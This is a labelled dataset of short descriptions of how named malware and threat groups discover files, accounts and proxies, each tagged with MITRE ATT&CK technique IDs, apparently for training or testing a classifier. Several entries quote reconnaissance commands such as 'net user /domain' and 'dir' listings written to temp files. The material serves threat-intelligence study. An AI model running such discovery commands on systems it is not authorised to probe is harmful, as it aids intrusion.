{"text1":"CosmicDuke searches attached and mounted drives for file extensions and keywords that match a predefined list.","labels":"['T1083']"}
{"text1":"CrackMapExec can discover specified filetypes and log files on a targeted system.","labels":"['T1083']"}
{"text1":"Crimson contains commands to list files and directories, as well as search for files matching certain extensions from a defined list.","labels":"['T1083']"}
{"text1":"Cryptoistic can scan a directory to identify files for deletion.","labels":"['T1083']"}
{"text1":"Cuba can enumerate files by using a variety of functions.","labels":"['T1083']"}
{"text1":"Cyclops Blink can use the Linux API `statvfs` to enumerate the current working directory.","labels":"['T1083']"}
{"text1":"DDKONG lists files on the victim\u2019s machine.","labels":"['T1083']"}
{"text1":"DEATHRANSOM can use loop operations to enumerate directories on a compromised host.","labels":"['T1083']"}
{"text1":"Dacls can scan directories on a compromised host.","labels":"['T1083']"}
{"text1":"Dark Caracal collected file listings of all default Windows directories.","labels":"['T1083']"}
{"text1":"DarkWatchman has the ability to enumerate file and folder names.","labels":"['T1083']"}
{"text1":"Darkhotel has used malware that searched for files with specific patterns.","labels":"['T1083']"}
{"text1":"Denis has several commands to search directories for files.","labels":"['T1083']"}
{"text1":"Derusbi is capable of obtaining directory, file, and drive listings.","labels":"['T1083']"}
{"text1":"Diavol has a command to traverse the files and directories in a given path.","labels":"['T1083']"}
{"text1":"Dragonfly 2.0 used a batch script to gather folder and file names from victim hosts.","labels":"['T1083']"}
{"text1":"Dragonfly has used a batch script to gather folder and file names from victim hosts.","labels":"['T1083']"}
{"text1":"DropBook can collect the names of all files and folders in the Program Files directories.","labels":"['T1083']"}
{"text1":"Dtrack can list files on available disk volumes.","labels":"['T1083']"}
{"text1":"During C0015, the threat actors conducted a file listing discovery against multiple hosts to ensure locker encryption was successful.","labels":"['T1083']"}
{"text1":"Dust Storm has used Android backdoors capable of enumerating specific files on the infected devices.","labels":"['T1083']"}
{"text1":"DustySky scans the victim for files that contain certain keywords and document types including PDF, DOC, DOCX, XLS, and XLSX, from a list that is obtained from the C2 as a text file. It can also identify logical drives for the infected machine.","labels":"['T1083']"}
{"text1":"Ebury can list directory entries.","labels":"['T1083']"}
{"text1":"Empire includes various modules for finding files of interest on hosts and network shares.","labels":"['T1083']"}
{"text1":"Epic recursively searches for all .doc files on the system and collects a directory listing of the Desktop, %TEMP%, and %WINDOWS%\\Temp directories.","labels":"['T1083']"}
{"text1":"FALLCHILL can search files on a victim.","labels":"['T1083']"}
{"text1":"FIVEHANDS has the ability to enumerate files on a compromised host in order to encrypt files with specific extensions.","labels":"['T1083']"}
{"text1":"FYAnti can search the \"C:\\Windows\\Microsoft.NET\\\" directory for files of a specified size.","labels":"['T1083']"}
{"text1":"FatDuke can enumerate directories on target machines.","labels":"['T1083']"}
{"text1":"FinFisher enumerates directories and scans for certain files.","labels":"['T1083']"}
{"text1":"FoggyWeb's loader can check for the FoggyWeb backdoor .pri file on a compromised AD FS server.","labels":"['T1083']"}
{"text1":"Forfiles can be used to locate certain types of files\/directories in a system.(ex: locate all files with a specific extension, name, and\/or age)","labels":"['T1083']"}
{"text1":"FunnyDream can identify files with .doc, .docx, .ppt, .pptx, .xls, .xlsx, and .pdf extensions and specific timestamps for collection.","labels":"['T1083']"}
{"text1":"Fysbis has the ability to search for files.","labels":"['T1083']"}
{"text1":"Gamaredon Group macros can scan for Microsoft Word and Excel files to inject with additional malicious macros. Gamaredon Group has also used its backdoors to automatically list interesting files (such as Office documents) found on a system.","labels":"['T1083']"}
{"text1":"Gelsemium can retrieve data from specific Windows directories, as well as open random files as part of Virtualization\/Sandbox Evasion.","labels":"['T1083']"}
{"text1":"GeminiDuke collects information from the victim, including installed drivers, programs previously executed by users, programs and services configured to automatically run at startup, files and folders present in any user's home folder, files and folders present in any user's My Documents, programs installed to the Program Files folder, and recently accessed files, folders, and programs.","labels":"['T1083']"}
{"text1":"Gold Dragon lists the directories for Desktop, program files, and the user\u2019s recently accessed files.","labels":"['T1083']"}
{"text1":"GoldenSpy has included a program \"ExeProtector\", which monitors for the existence of GoldenSpy on the infected system and redownloads if necessary.","labels":"['T1083']"}
{"text1":"GravityRAT collects the volumes mapped on the system, and also steals files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf, and .pdf.","labels":"['T1083']"}
{"text1":"HOPLIGHT has been observed enumerating system drives and partitions.","labels":"['T1083']"}
{"text1":"HTTPBrowser is capable of listing files, folders, and drives on a victim.","labels":"['T1083']"}
{"text1":"Heyoka Backdoor has the ability to search the compromised host for files.","labels":"['T1083']"}
{"text1":"Honeybee's service-based DLL implant traverses the FTP server\u2019s directories looking for files with keyword matches for computer names or certain keywords.","labels":"['T1083']"}
{"text1":"HotCroissant has the ability to retrieve a list of files in a given directory as well as drives and drive types.","labels":"['T1083']"}
{"text1":"Hydraq creates a backdoor through which remote attackers can check for the existence of files, including its own components, as well as retrieve a list of logical drives.","labels":"['T1083']"}
{"text1":"Imminent Monitor has a dynamic debugging feature to check whether it is located in the %TEMP% directory, otherwise it copies itself there.","labels":"['T1083']"}
{"text1":"Inception used a file listing plugin to collect information about file and directories both on local and remote drives.","labels":"['T1083']"}
{"text1":"InnaputRAT enumerates directories and obtains file attributes on a system.","labels":"['T1083']"}
{"text1":"InvisiMole can list information about files in a directory and recently opened or used documents. InvisiMole can also search for specific files by supplied file mask.","labels":"['T1083']"}
{"text1":"Ixeshe can list file and directory information.","labels":"['T1083']"}
{"text1":"JPIN can enumerate drives and their types. It can also change file permissions using cacls.exe.","labels":"['T1083']"}
{"text1":"KEYMARBLE has a command to search for files on the victim\u2019s machine.","labels":"['T1083']"}
{"text1":"Kasidet has the ability to search for a given filename on a victim.","labels":"['T1083']"}
{"text1":"Ke3chang uses command-line interaction to search files and directories.","labels":"['T1083']"}
{"text1":"KeyBoy has a command to launch a file browser or explorer on the system.","labels":"['T1083']"}
{"text1":"KillDisk has used the \"FindNextFile\" command as part of its file deletion process.","labels":"['T1083']"}
{"text1":"Koadic can obtain a list of directories.","labels":"['T1083']"}
{"text1":"Kwampirs collects a list of files and directories in C:\\ with the command \"dir \/s \/a c:\\ >> \"C:\\windows\\TEMP\\[RANDOM].tmp\"\".","labels":"['T1083']"}
{"text1":"Leafminer used a tool called MailSniper to search for files on the desktop and another utility called Sobolsoft to extract attachments from EML files.","labels":"['T1083']"}
{"text1":"Linfo creates a backdoor through which remote attackers can list contents of drives and search for files.","labels":"['T1083']"}
{"text1":"MESSAGETAP checks for the existence of two configuration files (keyword_parm.txt and parm.txt) and attempts to read the files every 30 seconds.","labels":"['T1083']"}
{"text1":"MacMa can search for a specific file on the compromised computer and can enumerate files in Desktop, Downloads, and Documents folders.","labels":"['T1083']"}
{"text1":"Machete produces file listings in order to search for files to be exfiltrated.","labels":"['T1083']"}
{"text1":"Magic Hound malware can list a victim's logical drives and the type, as well the total\/free space of the fixed devices. Other malware can list a directory's contents.","labels":"['T1083']"}
{"text1":"MarkiRAT can look for files carrying specific extensions such as: .rtf, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pps, .ppsx, .txt, .gpg, .pkr, .kdbx, .key, and .jpb.","labels":"['T1083']"}
{"text1":"MegaCortex can parse the available drives and directories to determine which files to encrypt.","labels":"['T1083']"}
{"text1":"Micropsia can perform a recursive directory listing for all volume drives available on the victim's machine and can also fetch specific files by their paths.","labels":"['T1083']"}
{"text1":"MiniDuke can enumerate local drives.","labels":"['T1083']"}
{"text1":"Misdat is capable of running commands to obtain a list of files and directories, as well as enumerating logical drives.","labels":"['T1083']"}
{"text1":"MobileOrder has a command to upload to its C2 server information about files on the victim mobile device, including SD card size, installed app list, SMS content, contacts, and calling history.","labels":"['T1083']"}
{"text1":"MoonWind has a command to return a directory listing for a specified directory.","labels":"['T1083']"}
{"text1":"NETEAGLE allows adversaries to enumerate and modify the infected host's file system. It supports searching for directories, creating directories, listing directory contents, reading and writing to files, retrieving file attributes, and retrieving volume information.","labels":"['T1083']"}
{"text1":"NETWIRE has the ability to search for files on the compromised host.","labels":"['T1083']"}
{"text1":"Nebulae can list files and directories on a compromised host.","labels":"['T1083']"}
{"text1":"NotPetya searches for files ending with dozens of different file extensions prior to encryption.","labels":"['T1083']"}
{"text1":"ObliqueRAT has the ability to recursively enumerate files on an infected endpoint.","labels":"['T1083']"}
{"text1":"OceanSalt can extract drive information from the endpoint and search files on the system.","labels":"['T1083']"}
{"text1":"Octopus can collect information on the Windows directory and searches for compressed RAR files on the host.","labels":"['T1083']"}
{"text1":"Okrum has used DriveLetterView to enumerate drive information.","labels":"['T1083']"}
{"text1":"Operation Wocao has gathered a recursive directory listing to find files and directories of interest.","labels":"['T1083']"}
{"text1":"Orz can gather victim drive information.","labels":"['T1083']"}
{"text1":"OutSteel can search for specific file extensions, including zipped files.","labels":"['T1083']"}
{"text1":"POORAIM can conduct file browsing.","labels":"['T1083']"}
{"text1":"POWRUNER may enumerate user directories on a victim.","labels":"['T1083']"}
{"text1":"Pasam creates a backdoor through which remote attackers can retrieve lists of files.","labels":"['T1083']"}
{"text1":"Penquin can use the command code \"do_vslist\" to send file names, size, and status to C2.","labels":"['T1083']"}
{"text1":"Peppy can identify specific files for exfiltration.","labels":"['T1083']"}
{"text1":"PingPull can enumerate storage volumes and folder contents of a compromised host.","labels":"['T1083']"}
{"text1":"Pisloader has commands to list drives on the victim machine and to list file information for a given directory.","labels":"['T1083']"}
{"text1":"PlugX has a module to enumerate drives and find files recursively.","labels":"['T1083']"}
{"text1":"PoetRAT has the ability to list files upon receiving the \"ls\" command from C2.","labels":"['T1083']"}
{"text1":"PowerDuke has commands to get the current directory name as well as the size of a file. It also has commands to obtain information about logical drives, drive type, and free space.","labels":"['T1083']"}
{"text1":"Psylo has commands to enumerate all storage devices and to find all files that start with a particular string.","labels":"['T1083']"}
{"text1":"Pteranodon identifies files matching certain file extension and copies them to subdirectories it created.","labels":"['T1083']"}
{"text1":"Pupy can walk through directories and recursively search for strings in files.","labels":"['T1083']"}
{"text1":"QakBot can identify whether it has been run previously on a host by checking for a specified folder.","labels":"['T1083']"}
{"text1":"QuietSieve can search files on the target host by extension, including doc, docx, xls, rtf, odt, txt, jpg, pdf, rar, zip, and 7z.","labels":"['T1083']"}
{"text1":"RARSTONE obtains installer properties from Uninstall Registry Key entries to obtain information about installed applications and how to uninstall certain applications.","labels":"['T1083']"}
{"text1":"REvil has the ability to identify specific files and directories that are not to be encrypted.","labels":"['T1083']"}
{"text1":"ROKRAT has the ability to gather a list of files and directories on the infected system.","labels":"['T1083']"}
{"text1":"RainyDay can use a file exfiltration tool to collect recently changed files with specific extensions.","labels":"['T1083']"}
{"text1":"Ramsay can collect directory and file lists.","labels":"['T1083']"}
{"text1":"Rclone can list files and directories with the `ls`, `lsd`, and `lsl` commands.","labels":"['T1083']"}
{"text1":"Remexi searches for files on the system.","labels":"['T1083']"}
{"text1":"RemoteUtilities can enumerate files and directories on a target machine.","labels":"['T1083']"}
{"text1":"Remsec is capable of listing contents of folders on the victim. Remsec also searches for custom network encryption software on victims.","labels":"['T1083']"}
{"text1":"Rising Sun can enumerate information about files from the infected system, including file size, attributes, creation time, last access time, and write time. Rising Sun can enumerate the compilation timestamp of Windows executable files.","labels":"['T1083']"}
{"text1":"Rover automatically searches for files on local drives based on a predefined list of file extensions.","labels":"['T1083']"}
{"text1":"SDBbot has the ability to get directory listings or drive information on a compromised host.","labels":"['T1083']"}
{"text1":"SHOTPUT has a command to obtain a directory listing.","labels":"['T1083']"}
{"text1":"SILENTTRINITY has several modules, such as `ls.py`, `pwd.py`, and `recentFiles.py`, to enumerate directories and files.","labels":"['T1083']"}
{"text1":"SLOTHFULMEDIA can enumerate files and directories.","labels":"['T1083']"}
{"text1":"SPACESHIP identifies files and directories for collection by searching for specific file extensions or file modification time.","labels":"['T1083']"}
{"text1":"SUGARDUMP can search for and collect data from specific Chrome, Opera, Microsoft Edge, and Firefox files, including any folders that have the string `Profile` in its name.","labels":"['T1083']"}
{"text1":"SUNSPOT enumerated the Orion software Visual Studio solution directory path.","labels":"['T1083']"}
{"text1":"Sandworm Team has enumerated files on a compromised host.","labels":"['T1083']"}
{"text1":"Seasalt has the capability to identify the drive type on a victim.","labels":"['T1083']"}
{"text1":"Several Lazarus Group has conducted word searches on compromised machines to identify specific documents of interest. Lazarus Group malware can use a common function to identify target files by their extension, and some also enumerate files and directories, including a Destover-like variant that lists files and gathers information for all drives.","labels":"['T1083']"}
{"text1":"Shamoon attempts to access the \"ADMIN$\", \"C$\\Windows\", \"D$\\Windows\", and \"E$\\Windows\" shares on the victim with its current privileges.","labels":"['T1083']"}
{"text1":"ShimRat can list directories.","labels":"['T1083']"}
{"text1":"Sidewinder has used malware to collect information on files and directories.","labels":"['T1083']"}
{"text1":"Siloscape searches for the Kubernetes config file and other related files using a regular expression.","labels":"['T1083']"}
{"text1":"Skidmap has checked for the existence of specific files including \"\/usr\/sbin\/setenforce\" and \" \/etc\/selinux\/config\". It also has the ability to monitor the cryptocurrency miner file and process.","labels":"['T1083']"}
{"text1":"Sliver can enumerate files on a target system.","labels":"['T1083']"}
{"text1":"Smoke Loader recursively searches through directories for files.","labels":"['T1083']"}
{"text1":"SombRAT can execute \"enum\" to enumerate files in storage on a compromised system.","labels":"['T1083']"}
{"text1":"Sowbug identified and extracted all Word documents on a server by using a command containing * .doc and *.docx. The actors also searched for documents based on a specific date range and attempted to identify all installed software on a victim.","labels":"['T1083']"}
{"text1":"StreamEx has the ability to enumerate drive types.","labels":"['T1083']"}
{"text1":"StrifeWater can enumerate files on a compromised host.","labels":"['T1083']"}
{"text1":"StrongPity can parse the hard drive on a compromised host to identify specific file extensions.","labels":"['T1083']"}
{"text1":"Stuxnet uses a driver to scan for specific filesystem driver objects.","labels":"['T1083']"}
{"text1":"SynAck checks its directory location in an attempt to avoid launching in a sandbox.","labels":"['T1083', 'T1497.001']"}
{"text1":"SysUpdate can search files on a compromised host.","labels":"['T1083']"}
{"text1":"TAINTEDSCRIBE can use \"DirectoryList\" to enumerate files in a specified directory.","labels":"['T1083']"}
{"text1":"TINYTYPHON searches through the drive containing the OS, then all drive letters C through to Z, for documents matching certain extensions.","labels":"['T1083']"}
{"text1":"TSCookie has the ability to discover drive information on the infected host.","labels":"['T1083']"}
{"text1":"Taidoor can search for specific files.","labels":"['T1083']"}
{"text1":"TajMahal has the ability to index files from drives, user profiles, and removable drives.","labels":"['T1083']"}
{"text1":"TeamTNT has used a script that checks `\/proc\/*\/environ` for environment variables related to AWS.","labels":"['T1083']"}
{"text1":"The IceApple Directory Lister module can list information about files and directories including creation time, last write time, name, and size.","labels":"['T1083']"}
{"text1":"TrickBot searches the system for all of the following file extensions: .avi, .mov, .mkv, .mpeg, .mpeg4, .mp4, .mp3, .wav, .ogg, .jpeg, .jpg, .png, .bmp, .gif, .tiff, .ico, .xlsx, and .zip. It can also obtain browsing history, cookies, and plug-in information.","labels":"['T1083']"}
{"text1":"Tropic Trooper has monitored files' modified time.","labels":"['T1083']"}
{"text1":"Turian can search for specific files and list directories.","labels":"['T1083']"}
{"text1":"Turla surveys a system upon check-in to discover files in specific locations on the hard disk %TEMP% directory, the current user's desktop, the Program Files directory, and Recent. Turla RPC backdoors have also searched for files matching the \"lPH*.dll\" pattern.","labels":"['T1083']"}
{"text1":"UNC2452 obtained information about the configured Exchange virtual directory using \"Get-WebServicesVirtualDirectory\".","labels":"['T1083']"}
{"text1":"USBferry can detect the victim's file or folder list.","labels":"['T1083']"}
{"text1":"Volgmer can list directories on a victim.","labels":"['T1083']"}
{"text1":"WannaCry searches for variety of user files by file extension before encrypting them using RSA and AES, including Office, PDF, image, audio, video, source code, archive\/compression format, and key and certificate files.","labels":"['T1083']"}
{"text1":"WarzoneRAT can enumerate directories on a compromise host.","labels":"['T1083']"}
{"text1":"WastedLocker can enumerate files and directories just prior to encryption.","labels":"['T1083']"}
{"text1":"WhisperGate can locate files based on hardcoded file extensions.","labels":"['T1083']"}
{"text1":"WinMM sets a WH_CBT Windows hook to search for and capture files on the victim.","labels":"['T1083']"}
{"text1":"WindTail has the ability to enumerate the users home directory and the path to its own application bundle.","labels":"['T1083']"}
{"text1":"Windigo has used a script to check for the presence of files created by OpenSSH backdoors.","labels":"['T1083']"}
{"text1":"Winnti Group has used a program named ff.exe to search for specific documents on compromised hosts.","labels":"['T1083']"}
{"text1":"Winnti for Windows can check for the presence of specific files prior to moving to the next phase of execution.","labels":"['T1083']"}
{"text1":"XAgentOSX contains the readFiles function to return a detailed listing (sometimes recursive) of a specified directory. XAgentOSX contains the showBackupIosFolder function to check for IOS device backups by running \"ls -la ~\/Library\/Application\\ Support\/MobileSync\/Backup\/\".","labels":"['T1083']"}
{"text1":"XCSSET has used `mdfind` to enumerate a list of apps known to grant screen sharing permissions.","labels":"['T1083']"}
{"text1":"Zebrocy searches for files that are 60mb and less and contain the following extensions: .doc, .docx, .xls, .xlsx, .ppt, .pptx, .exe, .zip, and .rar. Zebrocy also runs the \"echo %APPDATA%\" command to list the contents of the directory. Zebrocy can obtain the current execution path as well as perform drive enumeration.","labels":"['T1083']"}
{"text1":"Zox can enumerate files on a compromised host.","labels":"['T1083']"}
{"text1":"ZxShell has a command to open a file manager and explorer on the system.","labels":"['T1083']"}
{"text1":"admin@338 actors used the following commands after exploiting a machine with LOWBALL malware to obtain information about files and directories: \"dir c:\\ >> %temp%\\download\" \"dir \"c:\\Documents and Settings\" >> %temp%\\download\" \"dir \"c:\\Program Files\\\" >> %temp%\\download\" \"dir d:\\ >> %temp%\\download\"","labels":"['T1083']"}
{"text1":"ccf32 can parse collected files to identify specific file extensions.","labels":"['T1083']"}
{"text1":"cmd can be used to find files and directories with native functionality such as \"dir\" commands.","labels":"['T1083']"}
{"text1":"down_new has the ability to list the directories on a compromised host.","labels":"['T1083']"}
{"text1":"jRAT can browse file systems.","labels":"['T1083']"}
{"text1":"menuPass has searched compromised systems for folders of interest including those related to HR, audit and expense, and meeting memos.","labels":"['T1083']"}
{"text1":"njRAT can browse file systems using a file manager module.","labels":"['T1083']"}
{"text1":"zwShell can browse the file system.","labels":"['T1083']"}
{"text1":"APT29 obtained a list of users and their roles from an Exchange server using \"Get-ManagementRoleAssignment\".","labels":"['T1087']"}
{"text1":"XCSSET attempts to discover accounts from various locations such as a user's Evernote, AppleID, Telegram, Skype, and WeChat data.","labels":"['T1087']"}
{"text1":"APT1 used the commands \"net localgroup\",\"net user\", and \"net group\" to find accounts on the system.","labels":"['T1087.001']"}
{"text1":"APT3 has used a tool that can obtain info about local and global group users, power users, and administrators.","labels":"['T1087.001']"}
{"text1":"APT32 enumerated administrative users using the commands \"net localgroup administrators\".","labels":"['T1087.001']"}
{"text1":"Agent Tesla can collect account information from the victim\u2019s machine.","labels":"['T1087.001']"}
{"text1":"Bankshot gathers domain and account names\/information through process monitoring.","labels":"['T1087.001', 'T1087.002']"}
{"text1":"Bazar can identify administrator accounts on an infected host.","labels":"['T1087.001']"}
{"text1":"BitPaymer can enumerate the sessions for each user logged onto the infected host.","labels":"['T1087.001']"}
{"text1":"Chimera has used \"net user\" for account discovery.","labels":"['T1087.001']"}
{"text1":"Commands under \"net user\" can be used in Net to gather information about and manipulate user accounts.","labels":"['T1087.001']"}
{"text1":"During Operation CuckooBees, the threat actors used the `net user` command to gather account information.","labels":"['T1087.001']"}
{"text1":"Elise executes \"net user\" after initial communication is made to the remote server.","labels":"['T1087.001']"}
{"text1":"Empire can acquire local and domain user account information.","labels":"['T1087.001', 'T1087.002']"}
{"text1":"Epic gathers a list of all user accounts, privilege classes, and time of last logon.","labels":"['T1087.001']"}
{"text1":"HyperStack can enumerate all account names on a remote share.","labels":"['T1087.001']"}
{"text1":"InvisiMole has a command to list account information on the victim\u2019s machine.","labels":"['T1087.001']"}
{"text1":"Kazuar gathers information on local groups and members on the victim\u2019s machine.","labels":"['T1087.001']"}
{"text1":"Ke3chang performs account discovery using commands such as \"net localgroup administrators\" and \"net group \"REDACTED\" \/domain\" on specific permissions groups.","labels":"['T1087.001', 'T1087.002']"}
{"text1":"Kwampirs collects a list of accounts with the command \"net users\".","labels":"['T1087.001']"}
{"text1":"MURKYTOP has the capability to retrieve information about users on remote hosts.","labels":"['T1087.001']"}
{"text1":"Milan has run `C:\\Windows\\system32\\cmd.exe \/c cmd \/c dir c:\\users\\ \/s 2>&1` to discover local accounts.","labels":"['T1087.001']"}
{"text1":"Mis-Type may create a file containing the results of the command \"cmd.exe \/c net user {Username}\".","labels":"['T1087.001']"}
{"text1":"OSInfo enumerates local and domain users","labels":"['T1087.001', 'T1087.002']"}
{"text1":"OilRig has run \"net user\", \"net user \/domain\", \"net group \u201cdomain admins\u201d \/domain\", and \"net group \u201cExchange Trusted Subsystem\u201d \/domain\" to get account listings on a victim.","labels":"['T1087.001', 'T1087.002']"}
{"text1":"P.A.S. Webshell can display the \/etc\/passwd file on a compromised host.","labels":"['T1087.001']"}
{"text1":"POWERSTATS can retrieve usernames from compromised hosts.","labels":"['T1087.001']"}
{"text1":"PUNCHBUGGY can gather user names.","labels":"['T1087.001']"}
{"text1":"Pony has used the \"NetUserEnum\" function to enumerate local accounts.","labels":"['T1087.001']"}
{"text1":"Poseidon Group searches for administrator accounts on both the local victim machine and the network.","labels":"['T1087.001', 'T1087.002']"}
{"text1":"PoshC2 can enumerate local and domain user account information.","labels":"['T1087.001', 'T1087.002']"}
{"text1":"RATANKBA uses the \"net user\" command.","labels":"['T1087.001']"}
{"text1":"Remsec can obtain a list of users.","labels":"['T1087.001']"}
{"text1":"S-Type has run the command `net user` on a victim.","labels":"['T1087.001']"}
{"text1":"SMOKEDHAM has used \"net.exe user\" and \"net.exe users\" to enumerate local accounts on a compromised host.","labels":"['T1087.001']"}
{"text1":"Stuxnet enumerates user accounts of the local host.","labels":"['T1087.001']"}
{"text1":"TrickBot collects the users of the system.","labels":"['T1087.001']"}
{"text1":"Turla has used \"net user\" to enumerate local accounts on the system.","labels":"['T1087.001']"}
{"text1":"AdFind can enumerate domain users.","labels":"['T1087.002']"}
{"text1":"Bazar has the ability to identify domain administrator accounts.","labels":"['T1087.002']"}
{"text1":"BloodHound can collect information about domain users, including identification of domain admin accounts.","labels":"['T1087.002']"}
{"text1":"BoomBox has the ability to execute an LDAP query to enumerate the distinguished name, SAM account name, and display name for all domain users.","labels":"['T1087.002']"}
{"text1":"CrackMapExec can enumerate the domain user accounts on a targeted system.","labels":"['T1087.002']"}
{"text1":"Dragonfly 2.0 used batch scripts to enumerate users on a victim domain controller.","labels":"['T1087.002']"}
{"text1":"Dragonfly has used batch scripts to enumerate users on a victim domain controller.","labels":"['T1087.002']"}
{"text1":"During Operation Wocao, threat actors used the `net` command to retrieve information about domain accounts.","labels":"['T1087.002']"}
{"text1":"LAPSUS$ has used the AD Explorer tool to enumerate users on a victim's network.","labels":"['T1087.002']"}
{"text1":"Lazarus Group has queried an active directory server to obtain the list of accounts, including administrator accounts.","labels":"['T1087.002']"}
{"text1":"MuddyWater has used \"cmd.exe net user \/domain\" to enumerate domain users.","labels":"['T1087.002']"}
{"text1":"Net commands used with the \"\/domain\" flag can be used to gather information about and manipulate user accounts on the current domain.","labels":"['T1087.002']"}
{"text1":"Operation Wocao has used the \"net\" command to retrieve information about domain accounts.","labels":"['T1087.002']"}
{"text1":"POWRUNER may collect user account information by running \"net user \/domain\" or a series of other commands on a victim.","labels":"['T1087.002']"}
{"text1":"SILENTTRINITY can use `System.Security.AccessControl` namespaces to retrieve domain user information.","labels":"['T1087.002']"}
{"text1":"Sandworm Team has used a tool to query Active Directory using LDAP, discovering information about usernames listed in AD.","labels":"['T1087.002']"}
{"text1":"SoreFang can enumerate domain accounts via \"net.exe user \/domain\".","labels":"['T1087.002']"}
{"text1":"Stuxnet enumerates user accounts of the domain.","labels":"['T1087.002']"}
{"text1":"The IceApple Active Directory Querier module  can perform authenticated requests against an Active Directory server.","labels":"['T1087.002']"}
{"text1":"Turla has used \"net user \/domain\" to enumerate domain accounts.","labels":"['T1087.002']"}
{"text1":"Valak has the ability to enumerate domain admin accounts.","labels":"['T1087.002']"}
{"text1":"dsquery can be used to gather information on user accounts within a domain.","labels":"['T1087.002']"}
{"text1":"menuPass has used the Microsoft administration tool csvde.exe to export Active Directory data.","labels":"['T1087.002']"}
{"text1":"Backdoor.Oldrea collects address book information from Outlook.","labels":"['T1087.003']"}
{"text1":"BoomBox can execute an LDAP query to discover e-mail accounts for domain users.","labels":"['T1087.003']"}
{"text1":"Emotet has been observed leveraging a module that can scrape email addresses from Outlook.","labels":"['T1087.003']"}
{"text1":"Lizar can collect email accounts from Microsoft Outlook and Mozilla Thunderbird.","labels":"['T1087.003']"}
{"text1":"Magic Hound has used Powershell to discover email accounts.","labels":"['T1087.003']"}
{"text1":"MailSniper can be used to obtain account names from Exchange and Office 365 using the \"Get-GlobalAddressList\" cmdlet.","labels":"['T1087.003']"}
{"text1":"Ruler can be used to enumerate Exchange users and dump the GAL.","labels":"['T1087.003']"}
{"text1":"TrickBot collects email addresses from Outlook.","labels":"['T1087.003']"}
{"text1":"AADInternals can enumerate Azure AD users.","labels":"['T1087.004']"}
{"text1":"APT41 used a tool called CLASSFON to covertly proxy network communications.","labels":"['T1090']"}
{"text1":"BADCALL functions as a proxy server between the victim and C2 server.","labels":"['T1090']"}
{"text1":"Dridex contains a backconnect module for tunneling network traffic through a victim's computer. Infected computers become part of a P2P botnet that can relay C2 traffic to other infected peers.","labels":"['T1090']"}
{"text1":"Earth Lusca adopted Cloudflare as a proxy for compromised servers.","labels":"['T1090']"}
{"text1":"FLIPSIDE is a simple proxy that creates an outbound RDP connection.","labels":"['T1090']"}
{"text1":"For Operation Sharpshooter, the threat actors used the ExpressVPN service to hide their location.","labels":"['T1090']"}
{"text1":"Fox Kitten has used the open source reverse proxy tools including FRPC and Go Proxy to establish connections from C2 to local servers.","labels":"['T1090']"}
{"text1":"Gazer identifies a proxy server if it exists and uses it to make HTTP requests.","labels":"['T1090']"}
{"text1":"HOPLIGHT has multiple proxy options that mask traffic between the malware and the remote operators.","labels":"['T1090']"}
{"text1":"HTRAN can proxy TCP socket connections to obfuscate command and control infrastructure.","labels":"['T1090']"}
{"text1":"KOCTOPUS has deployed a modified version of Invoke-Ngrok to expose open local ports to the Internet.","labels":"['T1090']"}
{"text1":"LAPSUS$ has leverage NordVPN for its egress points when targeting intended victims.","labels":"['T1090']"}
{"text1":"NETWIRE can implement use of proxies to pivot traffic.","labels":"['T1090']"}
{"text1":"Ngrok can be used to proxy connections to machines located behind NAT or firewalls.","labels":"['T1090']"}
{"text1":"POLONIUM has used the AirVPN service for operational activity.","labels":"['T1090']"}
{"text1":"PoshC2 contains modules that allow for use of proxies in command and control.","labels":"['T1090']"}
{"text1":"QuasarRAT can communicate over a reverse proxy using SOCKS5.","labels":"['T1090']"}
{"text1":"Remcos uses the infected hosts as SOCKS5 proxies to allow for tunneling and proxying.","labels":"['T1090']"}
{"text1":"SDBbot has the ability to use port forwarding to establish a proxy between a target host and C2.","labels":"['T1090']"}
{"text1":"SombRAT has the ability to use an embedded SOCKS proxy in C2 communications.","labels":"['T1090']"}
{"text1":"Ursnif has used a peer-to-peer (P2P) network for C2.","labels":"['T1090']"}
{"text1":"Vasport is capable of tunneling though a proxy.","labels":"['T1090']"}
{"text1":"WarzoneRAT has the capability to act as a reverse proxy.","labels":"['T1090']"}
{"text1":"Windigo has delivered a generic Windows proxy Win32\/Glubteta.M. Windigo has also used multiple reverse proxy chains as part of their C2 infrastructure.","labels":"['T1090']"}
{"text1":"Wizard Spider has used a module named NewBCtestnDll64 as a reverse SOCKS proxy.","labels":"['T1090']"}
{"text1":"ZxShell can set up an HTTP or SOCKS proxy.","labels":"['T1090']"}
{"text1":"netsh can be used to set up a proxy tunnel to allow remote host access to an infected host.","labels":"['T1090']"}
{"text1":"APT39 used custom tools to create SOCK5 and custom protocol proxies between infected hosts.","labels":"['T1090.001']"}
{"text1":"CHOPSTICK used a proxy server between victims and the C2 server.","labels":"['T1090.001']"}
{"text1":"Cobalt Strike can be configured to have commands relayed over a peer-to-peer network of infected hosts. This can be used to limit the number of egress points, or provide access to a host without direct internet access.","labels":"['T1090.001']"}
{"text1":"Duqu can be configured to have commands relayed over a peer-to-peer network of infected hosts if some of the hosts do not have Internet access.","labels":"['T1090.001']"}
{"text1":"FatDuke can used pipes to connect machines with restricted internet access to remote machines via other infected hosts.","labels":"['T1090.001']"}
{"text1":"Higaisa discovered system proxy settings and used them if available.","labels":"['T1090.001']"}
{"text1":"Hikit supports peer connections.","labels":"['T1090.001']"}
{"text1":"Lazarus Group has used a compromised router to serve as a proxy between a victim network's corporate and restricted segments.","labels":"['T1090.001']"}
{"text1":"MiniDuke can can use a named pipe to forward communications from one compromised machine with internet access to other compromised machines.","labels":"['T1090.001']"}
{"text1":"Mythic can leverage a peer-to-peer C2 profile between agents.","labels":"['T1090.001']"}
{"text1":"Operation Wocao can proxy traffic through multiple infected systems.","labels":"['T1090.001']"}
{"text1":"Pay2Key has designated machines in the compromised network to serve as reverse proxy pivot points to channel communications with C2.","labels":"['T1090.001']"}
{"text1":"Strider has used local servers with both local network and Internet access to act as internal proxy nodes to exfiltrate data from other parts of the network without direct Internet access.","labels":"['T1090.001']"}
{"text1":"The \"ZJ\" variant of BACKSPACE allows \"ZJ link\" infections with Internet access to relay traffic from \"ZJ listen\" to a command server.","labels":"['T1090.001']"}
{"text1":"The Winnti for Windows HTTP\/S C2 mode can make use of a local proxy.","labels":"['T1090.001']"}
{"text1":"Turla has compromised internal network systems to act as a proxy to forward traffic to C2.","labels":"['T1090.001']"}
{"text1":"UNC2452 configured at least one instance of Cobalt Strike to use a network pipe over SMB during the 2020 SolarWinds intrusion.","labels":"['T1090.001']"}
